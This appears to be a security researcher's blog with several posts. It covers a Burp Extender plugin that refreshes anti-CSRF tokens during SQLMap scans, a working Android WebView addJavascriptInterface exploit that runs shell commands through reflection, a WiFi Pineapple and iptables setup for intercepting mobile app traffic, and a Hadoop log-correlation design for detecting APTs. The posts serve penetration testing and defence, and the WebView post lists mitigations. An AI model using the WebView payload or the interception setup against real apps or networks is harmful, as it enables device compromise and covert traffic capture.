Monday, July 8, 2013

Anti-CSRF token support using Burp Extender API

I was recently faced with a problem where I was using SQL Map to scan a URL for SQL injection vulnerabilities. The issue was that after every POST request to the server my Anti-CSRF token would get reset and I could not figure out a way to retrieve the Anti-CSRF token form the response body and set it back in the next request sent by SQLMap.
I overcame this issue using Burp's Extender functionality and proxying SQLMap traffic thru burp. For those who are not familiar with Burp Extender, check http://portswigger.net/burp/extender/ out. Burp Extender allows us to hook into various events of the Burp application.
I've written a small program to record the Anti-CSRF token from the server response and then add it back to the request sent to the server.

PS: I will fix formatting issues and beautify the code soon. ;)

Download API : http://portswigger.net/burp/extender/api/burp_extender_api.zip
Follow the setup instruction present in http://blog.portswigger.net/2009/04/using-burp-extender.html

Modify the processHttpMessage method as follows :

@Override
public void processHttpMessage(int toolFlag, boolean messageIsRequest,IHttpRequestResponse messageInfo) {
 
 //HostName of the host you want to test. 
        String HOST = "m.test.isecpartners.com";
 
 IHttpService httpService = messageInfo.getHttpService();
 
 // If this is a response then record the CSRF token.
 if (!messageIsRequest) {
 
  if (HOST.equalsIgnoreCase(httpService.getHost())) {
   byte[] responseBytes = messageInfo.getResponse();
   String responseString = new String(responseBytes);
   int start = responseString.indexOf("<input type=\"hidden\" name=\"token\" id=\"token\" value=\"");
   if (start > 0) {
    // Extract the CSRF token value.
    String token = responseString.substring(start + 52,start + 51 + 57);
    stdout.println("Response Token:" + token);
    globalToken = token;
   }
  }
 } else {
  // In the request, we replace the CSRF token in the request with the
  // globalToken
 
  if (HOST.equalsIgnoreCase(httpService.getHost())) {
   IRequestInfo info = helpers.analyzeRequest(messageInfo);
   List<String> headers = info.getHeaders();
   IParameter token = helpers.getRequestParameter(messageInfo.getRequest(), "token");
   byte[] byteMessage = messageInfo.getRequest();
   if (token != null && !globalToken.isEmpty()) {
    stdout.println("Request Token :" + token.getValue()+ " Global Token : " + globalToken);
    // Remove the incorrect Anti-CSRF token from the request
    byteMessage = helpers.removeParameter(byteMessage, token);
    IParameter newToken = helpers.buildParameter("token", globalToken, IParameter.PARAM_BODY);
    // Add the correct Anti-CSRF token to the request.
    byteMessage = helpers.addParameter(byteMessage, newToken);
    // Set the request with the new token.
    messageInfo.setRequest(byteMessage);
   }
 
  }
 }
}

Run the extender jar file :
java -Xmx512m -classpath burpextender.jar;burp.jar burp.StartBurp
Output generated by the Extender Plugin can be seen in the Extender Tab's output sub-tab.


This can also be used with the BURP Scanner tool which modifies the same request packet without considering the values present in the response packet.



There are several possibilities using the BURP Extender tool. 

Remote code execution in Android WebViews

Enabling the addJavaScriptInterface method allows JavaScript hosted in WebView to directly invoke methods in an app through a JavaScript interface. Any untrusted content hosted in the WebView could potentially use reflection to figure out the public methods within the JavaScript Interface object and make use of them. Additionally, an attacker can also make use of reflection to replace contents in the application's private directory.
In the below code androidbridge is the exposed JavaScript bridge.

( PS : I shall fix the formatting issues and beautify the code in some time )

<!DOCTYPE html >
<html>
<head > <meta content="text/html;charset=UTF -8" http -equiv="content -type">
<script >
 function execute(cmdArgs)
 {
   var temp = androidbridge.getClass ().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null ,null);
   temp.exec(cmdArgs);
   return 1;
 }
  var maliciousContents = "isecPartners";
  execute (["/system/bin/sh","-c","echo '" +maliciousContents +"' > /data/data/com.goodcompany.private.directory/evilFile"]);
</script >
<body > No Content here </body >
</html >


Where "androidbridge" is the name for injected java object (JSInterface) in the webview.

webView.addJavascriptInterface(new JSInterface(this), "androidbridge");

Solution: Beginning in Android 4.2, developers must explicitly annotate public methods with @JavascriptInterface in order to make them accessible by hosted JavaScript. Note: This also takes effect only if the developer sets the application's minSdkVersion or targetSdkVersion to 17 or higher. Set the application's minSdkVersion or targetSdkVersion to 17 or higher so that hosted JavaScript can access only explicitly annotated Java methods.

Another solution would be to navigate to domains outside the whitelisted domains, by using shouldOverrideUrlLoading, checking if the domain is allowed and using the default Android browser, rather than the WebView to open the URL if it is not trusted.


Ref: [1] http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29 [2] http://android-developers.blogspot.com/2013/02/security-enhancements-in-jelly-bean.html

Monday, December 12, 2011

Testing mobile applications where setting a proxy is not an option.

Advantages :

  1.  This is a one time process and can be easily reused when required.
  2.  Robust and fast.

Successfully tested against :

  1.  Mobile operating systems not supporting - setting of proxy.
  2.  Mobile operating systems in development.
  3.  Mobile application assessment.

Often times there are situations where we need to test applications on platforms that don’t allow us to set a proxy, especially on mobile platforms that aren’t finished yet and don’t offer an emulator to test the apps or setting up and working on the emulator requires too much time and effort. I recently tested out WI-FI pineapple [1] for this purpose and found it very convenient and easy to use. A pineapple and a backtrack Linux are handy tools for any mobile application/platform pen test. These steps are for the first version of Pineapple.[2] (The current one is WiFi Pineapple Mark III and may require a different setup process) The pineapple cannot be used for pentest purpose right out of the box and some modifications are necessary on the pineapple and the backtrack Linux. There is a good post on the pineapple forums for setting the internet connection up here. [3]
I have summarized the steps given in the forum with some additional information here.

Tools needed to perform the set up:

  1. WiFi pineapple ( Any router that runs openwrt )
  2. Backtrack 5 ( Any linux distribution with burp, wireshark and other required tools)
  3. VMWare ( Any virtualization software ) If you are running the above linux OS in a VM.
  4. Ethernet to USB converter.
  5. Ethernet Cable.

STEP1: The OOB pineapple has the following configuration:
Default Settings
   Wireless SSID: Pineapple
   Wireless Encryption: None
   Wireless IP Address: 192.168.1.1
   Root password: pineapplesareyummy

Configuration files
   /etc/config/wireless
   /etc/config/network

Connect the pineapple to your system using the Ethernet cable. SSH into the pineapple using the above default settings. Edit the /etc/config/dhcp configuration file so it looks like this.

config dnsmasq
option domainneeded 1
option boguspriv 1
option filterwin2k '0' #enable for dial on demand
option localise_queries 1
option local '/lan/'
option domain 'lan'
option expandhosts 1
option nonegcache 0
option authoritative 1
option readethers 1
option leasefile '/tmp/dhcp.leases'
option resolvfile '/tmp/resolv.conf.auto'
config dhcp lan
option interface lan
option start 100
option limit 150
option leasetime 12h
option ignore 0
list dhcp_option 3,10.110.0.1
list dhcp_option 6,10.110.0.2,208.67.222.222
list dhcp_option 6,10.110.0.2,8.8.8.8
config dhcp wan
option interface wan
option ignore 1
option start 100
option limit 150
option leasetime 12h
list dhcp_option 3,10.110.0.1
list dhcp_option 6,10.110.0.2,208.67.222.222
list dhcp_option 6,10.110.0.2,8.8.8.8
Edit the /etc/config/network configuration file so it looks like this.
config 'interface' 'loopback'
option 'ifname' 'lo'
option 'proto' 'static'
option 'ipaddr' '127.0.0.1'
option 'netmask' '255.0.0.0'
config 'interface' 'lan'
option 'ifname' 'eth0'
option 'type' 'bridge'
option 'proto' 'static'
option 'netmask' '255.255.255.0'
option 'macaddr'
option 'ipaddr' '10.110.0.2'
option 'ip6addr'
option 'gateway' '10.110.0.1'
option 'ip6gw'
option 'dns'
Reboot the pineapple.

STEP2: Setting up backtrack 5. (Virtual machine) The Eth1 interface can be connected to your host machines network either by a direct connection or a bridged connection. This is your default internet interface to the Linux virtual machine. ( 1- ifconfig eth1 up 2- dhcpcd eth1) I purchased a Ethernet to USB convertor here to connect the pineapple’s Ethernet directly to one of the Backtrack Linux‘s interface, usually it is ETH3 and gets detected automatically. Once you have plugged in, use the following commands to get the eth3 interface up on the linux vm (1- ifconfig eth3 up 2- dhcpcd eth3 )

Finally run this script to forward the incoming traffic from the pineapple’s interface (eth3) to the internet connected interface (eth1).

#!/bin/bash
#
# SET GLOBAL VARIABLES
#

FON_IP_BLOCK="10.110.0.0/24"
NETMASK="255.255.255.0"
GW_NIC_IP="10.110.0.1"
# These will be used as the Default Network Interfaces
#
Wan="eth1" # Connected to the internet
Lan="eth3" # Connected to the Pineapple-usb ethernet adapter. 
Ssl="N"


       read -p "Do you want to proxy ssl traffic? Y/N:" Ssl

# This get's the GateWay IP address and sets it to the varable $Gw
#
Gw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'`




# Sets $Lan's IP address to 10.110.0.1 and netmask 255.255.255.0
#
ifconfig $Lan $GW_NIC_IP  netmask $NETMASK

echo "$Lan is given the IP address of $GW_NIC_IP & netmask $NETMASK"
echo ""


# Enables IPv4 Forwarding it alredy enabled it dose nothing
#
IPFWD=`cat /proc/sys/net/ipv4/ip_forward`
if [ $IPFWD -eq 1 ]; then

echo "IP forwarding enabled!"
echo ""

else
echo '1' > /proc/sys/net/ipv4/ip_forward
echo "IP forwarding enabled!"
echo ""


fi


# This next IF statement block sets all the iptables rules
# And the default route
#
iptables --version > /dev/null 2>&1
if [ $? -eq 0 ]; then


# Clear all iptabes Chains and Rules
#
iptables -X
iptables -F
                iptables -F -t nat
echo "All iptables chains and rules cleared. . . Setting new iptables rules"
echo ""


# This checks if the user entered Y or y to the question asking if they wanted to use sslstrip
# If they did it will set an iptables rule to forward all Port 80 traffic from $Lan to
# The default sslstrip listening Port 10000
#
if [ $Ssl == "y" -o $Ssl == "Y" -o $Ssl == "yes" ]; then

iptables -t nat -A PREROUTING -i $Lan -p tcp --destination-port 80 -j REDIRECT --to-ports 80 
                        iptables -t nat -A PREROUTING -i $Lan -p tcp --destination-port 443 -j REDIRECT --to-ports 443 
                        #iptables -t nat -A PREROUTING -i $Lan -p tcp --destination-port 9997 -j REDIRECT --to-ports 9997

else
echo "skipping routing via the sslstrip port"
iptables -t nat -A PREROUTING -i $Lan -p tcp --destination-port 80 -j REDIRECT --to-ports 80 

fi


# This sets up the IPv4 forwarding form the $Wan to $Lan
#
iptables -A FORWARD -i $Wan -o $Lan -s $FON_IP_BLOCK -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
echo "iptables configured..."
echo ""


# Removes the Default Route
#
route del default

echo "Default route removed. . ."

route add default gw $Gw $Wan

echo "Default route set to $Gw through $Wan"
echo ""

else
echo "Please run as root or install iptables..."
fi

exit


Finally start burp and listen on port 80. You may optionally start wireshark and listen on interface eth3 and study the traffic. Connect your non proxy aware client to the pineapples SSID. Proxying SSL traffic. While executing the above script you are asked an option whether you want to proxy SSL traffic. Enter Y if you want to capture SSL traffic on burp. Run Burp and listen on port 443.
Note: Do not use open JDK which is by default installed on burp. This may cause SSL handshake failure. You will need to install sun version of java on backtrack for this.
#java -jar -Xmx512m -Dsun.security.ssl.allowUnsafeRenegotiation=true burpsuite_pro_v1.3.jar
Additionally, you will need to run burp on invisible proxy mode and make use of generate a CA-signed certificate with a specific host name. “You should use this option if you are using invisible proxy mode with SSL connections - in this scenario, per-host certificates cannot be generated because the browser does not send a CONNECT request, and so the SSL negotiation precedes the receipt of the host information from the browser. The fixed host certificate is signed by Burp's CA certificate, which you can install in your client so that the host certificate is accepted without any alerts (provided you specify the correct hostname).” [Burp help files]

[1]http://hakshop.myshopify.com/collections/frontpage/products/wifi-pineapple
[3]http://forums.hak5.org/index.php?s=af48684cd6d19afc977ffe7b4fbea412&showtopic=15200

Friday, September 23, 2011

Using Hadoop-MapReduce for faster log-correlation to detect APT.

The only well-known method of detecting an APT is by log analysis and correlation. “You need to put into place the processes and possibly the technology necessary to cultivate the security logs and pinpoint the information needed to keep the infrastructure secure. These efforts absolutely require some type of log management and correlation.” Correlation could be rule based correlation, statistical or algorithmic correlation, as well as other methods that involve relating various event logs to each other in order to detect a particular anomaly in the information system. Also as Alex Stamos from iSEC Partners has pointed out in his paper Aurora Response Recommendations [2], the companies with the most effective response to these attacks have utilized their central log aggregation mechanisms to track the actions of these attackers.
There can be plenty of locations on a system where these logs can be present. Also, the size of these log files is pretty huge. When considered on an enterprise level or a network of systems, human interaction is not a practical approach for log correlation and analysis, since the amount of task involved is quite substantial.
The solution I propose is to use the services of parallel programming, specifically the HadoopMapReduce framework to solve this issue. Hadoop-MapReduce is a programming model and software framework for writing applications that rapidly process vast amounts of data in parallel on large clusters of compute nodes. [21] In Map-Reduce the data processing primitives are called mappers and reducers. This framework enables scaling the application to run over multiple (thousands) machines in the cluster and can be controlled by doing a configuration change. The framework is appropriate for log correlation and analysis because of the inherent parallel processability of the logs. Hunting for a specific event or a set of events in thousands of log files (each sometimes having terabytes of data) on various servers is not feasible or is way too slow on a single node non-parallel approach.


In a non Hadoop distributed approach if all the logs are stored on one central storage server, then the bottleneck is in the bandwidth of that server. Having more machines for processing only helps up to a
certain point- until the storage server can’t keep up. You will also need to split up the logs among the set of processing machines such that each machine will process only those logs that are stored in it to
remove this bottleneck. The storage and processing of the data have to be tightly coupled in data intensive distributed applications. Hadoop differs from traditional distributed data processing schemes.
Hadoop focuses on moving code to data instead of vice versa. [23 - Chapter 1] To see how Hadoop fits into the design of distributed systems, I suggest you read [23] and [22].

Implementation of Hadoop-MapReduce for Log Correlation

Step 1: Since the starting point for a majority of attacks involving APT’s start with one of the application crashing. The first step would be to look for any such crashes. On a standalone windows system any application errors or crashes would be recorded in the application – event logs. This process could be automated. We could write a java program that parses through just the application log file and detect any such log entries. Once the crash or exception in the application is noticed we record the date and time of the crash.

Step2: Our next step is to bring all the related log file entries together. Because the Map function would run on different nodes it is important to get all the different log file entries across different log files falling in the same date and time range together. This step could be performed by the MAP function. The input and output for the initial MAP function are as follows,


Our MAP function is not doing much of any computation on the log data. Its main aim is to get the data present in various different log files falling in the required time range together. So the input could be directly passed as the output. We can also perform some cleaning up here, if we consider that certain log entries are unnecessary we can omit them here. Also log entries out of our time range could be omitted here. Also, we can have a utility function that takes dates and time in different formats and converts them to a time stamp which would make it easy to compare and sort. The output of this MAP function and eventually all MAP functions across all nodes goes to the MapReduce Framework before going to the REDUCE function. The framework now sorts and groups the different pairs by key. One important aspect to note here is that the sorting happens in an ascending order i.e. the latest event is at the bottom of the list. Values with same keys (timestaps) are grouped together. This input now goes into the REDUCE function.



We have two places where we could omit the unwanted log data. One is in the MAP function where before outputting the values we can write a filter to remove the unwanted log entries. The other place is the REDUCE function where once we have the sorted data we can remove the unwanted log entries. If we wait till REDUCE function to omit unwanted data our resources may get wasted since the framework is processing the unwanted data. Now we have the relevant log data in the desired format and sorted in an appropriate way. The input to the REDUCE program would be all the potential logs that need to be searched for any kind of intrusion attempt. We need to implement our behavior based ranking system here and assign points to the various log files. The logic would be “if a particular log entry has any corresponding key words from the key word database then based on the relevance of the log file we assign a value on the scale of 10 to that particular log entry.” This value we assign is based on significance of the log entry with the corresponding to the application that crashed. For example, a log entry which says a file was downloaded in the system32 folder during that time duration would have a value of ‘8’ where as a log entry that says some completely unrelated application made some registry changes would have a value of ‘0’. There are a couple of factors that favor this approach. First, as we parse the log entries we discover new keywords that could be added to the keyword data type which increases the relevance of log entries higher up in the list. The keyword data type would initially be empty or it could contain the name or process id of the application that initially crashed. Second, the log entries are sorted in an ascending order. The relevance value of the different logs could be added up and the final value could be the output of the program.


Tests could be conducted to find an optimal relevance value that signifies that an intrusion has taken place in the system.

There are quite a few problems with this approach. More on the problems and solutions in the next post.

[21] http://hadoop.apache.org/mapreduce/
[22] Hadoop in Action. Author: Chuck Lam
[23] Hadoop the Definitive Guide Author: Tom Whit